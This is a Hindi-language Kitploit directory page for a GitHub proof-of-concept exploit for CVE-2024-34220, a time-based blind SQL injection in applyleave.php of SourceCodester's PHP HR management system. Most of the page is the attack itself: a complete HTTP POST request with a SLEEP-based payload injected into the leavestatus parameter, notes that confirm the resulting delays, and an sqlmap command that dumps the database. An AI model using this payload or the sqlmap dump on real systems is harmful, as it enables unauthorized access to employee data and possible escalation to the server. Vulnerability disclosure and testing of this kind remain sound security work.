Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-34220 — CVE-2024-34220 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो SourceCodester HRMS के applyleave.php में एक टाइम-बेस्ड ब्लाइंड SQL इंजेक्शन भेद्यता है, जिसमें डेटाबेस निष्कर्षण के लिए sqlmap स्वचालन शामिल है। | Kitploit
उपकरण/GitHubGitHub/dovankha/cve-2024-34220
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubdovankha/cve-2024-34220

CVE-2024-34220

CVE-2024-34220 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो SourceCodester HRMS के applyleave.php में एक टाइम-बेस्ड ब्लाइंड SQL इंजेक्शन भेद्यता है, जिसमें डेटाबेस निष्कर्षण के लिए sqlmap स्वचालन शामिल है।

रिपॉजिटरी देखें
22 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PHP और MySQL में मानव संसाधन प्रबंधन प्रणाली परियोजना निःशुल्क स्रोत कोड

प्रस्तुतकर्ता: Kha Do

विक्रेता: SourceCodester

प्रभावित और/या फिक्स्ड संस्करण

भेद्य फ़ाइल

applyleave.php

समस्या का प्रकार

भेद्यता प्रकार

SQL इंजेक्शन

प्रभाव

हमलावर इस भेद्यता का दोहन करके डेटाबेस विशेषाधिकार प्राप्त कर सकते हैं, जिसके परिणामस्वरूप डेटाबेस में मौजूद बड़ी मात्रा में डेटा प्रभावित हो सकता है। यदि दूसरे पक्ष के डेटाबेस में DBA विशेषाधिकार हैं, तो इससे सर्वर होस्ट विशेषाधिकार प्राप्त हो सकते हैं।

POC

पेलोड

root@kitploit:~
POST /hrm/user/applyleave.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Origin: http://localhost
Connection: close
Referer: http://localhost/hrm/user/applyleave.php
Cookie: PHPSESSID=2v2v2al4dkd4iir9cl5j7oikvr
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: cyan

leavestatus=5'+AND+(SELECT+1337+FROM+(SELECT(SLEEP(5)))VSgR)+AND+'Kha'%3d'123&reason=+++&startdate=03%2F04%2F2024&enddate=29%2F04%2F2024&Apply=Submit

इस पेलोड को चलाने के बाद, डेटा लौटने में 5 सेकंड की देरी हो जाती है, यह दर्शाता है कि हमने संभवतः "sleep(5)" को सफलतापूर्वक निष्पादित कर लिया है। इस मामले में, विलंब कई गुना हो सकता है। हम इसे नीचे सत्यापित करेंगे: SQL_Injection

इस पेलोड को चलाने के बाद, डेटा लौटने में 20 सेकंड की देरी हो जाती है, यह दर्शाता है कि हमने संभवतः "sleep(20)" को सफलतापूर्वक निष्पादित कर लिया है। इस मामले में, विलंब कई गुना हो सकता है। हम इसे नीचे सत्यापित करेंगे: SQL_Injection_1

SQLmap

root@kitploit:~
sqlmap -r <item request> --dump

sqlmap

टूल डाउनलोड करें